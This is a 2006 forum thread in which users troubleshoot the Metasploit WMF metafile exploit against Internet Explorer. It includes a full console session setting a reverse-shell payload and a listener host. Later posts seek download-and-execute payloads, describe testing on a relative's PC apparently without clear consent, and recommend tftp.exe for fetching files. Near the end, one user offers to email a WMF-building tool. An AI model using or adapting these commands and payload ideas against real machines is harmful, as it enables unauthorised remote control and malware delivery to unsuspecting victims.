When I do this between two machines on my LAN it seems to hang at [*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.102:8080/
[*] HTTP Client connected from 192.168.1.100:1323, redirecting...
[*] HTTP Client connected from 192.168.1.100:1324, sending 1980 bytes of payload...
[*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
Am I doing something wrong or is there something else I need to do?
This post has been edited by shatter: 03 January 2006 - 07:48 PM
I don't think you are doing something wrong. I tried it successfully yesterday, but today I got the same thing as you. IT SEEMS TO ME THAT IT HAS BEEN PATCHED.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Used with permission by san[at]xfocus.org:
------------------------------------------
....
Is this some stuff to put in a file to make a vuln pic?
After searching and searching I found most things myself, but I can't find anything about the payloads.
What is that? Is that some kind of program? How can I make my own payload that downloads something from
the web?
This post has been edited by mrgoolie: 04 January 2006 - 02:58 AM
After hours searching for more information I understand the WMF exploit.
But still some little questions: the payload win32_adduser doesn't work here,
I always get an error.
And has anybody already found a way to make a payload that uploads
and executes a file? I tried with win32_exec but I can't find a way to give
parameters to the ftp.exe command, and I think that Firefox is also patched,
because I can't find a working way to exploit....
I tested it on my brother's PC with the win32_exec command, and then the cmd:
calc.exe and it works, so when I go to that site, it opens calc.exe.
Now I just want to find a way so it downloads a file from the internet... and opens it
This post has been edited by mrgoolie: 04 January 2006 - 04:48 AM
Instead of using ftp.exe you could use tftp.exe, it doesn't have its own shell, just type tftp.exe /? for more information!
I can't uninstall it, there seems to be some kind of "Uninstall Shield".
Long time no post :) I need to see if I can get hold of the "WMF maker" app, as I need to test my GW security to make sure it is stripping out the WMF code.
So anyone know a site where I can grab the app?
Thanks in advance
www.metasploit.com
download it there
the exploit is in the framework
Maybe he means an app for WMF creation and not the exploit, or am I wrong?.... I've seen that tool on another site, if you really need that tool I can post it here...
Yep that is what I mean. I need to make the WMF files to pass through a number of different levels of GW security devices, so although I could do it via Metasploit it would be easier if I had the file :) If you could post it or the URL it would be great.
Sure, but it seems that I can't attach files.... If you want I'll send it by email :) let me know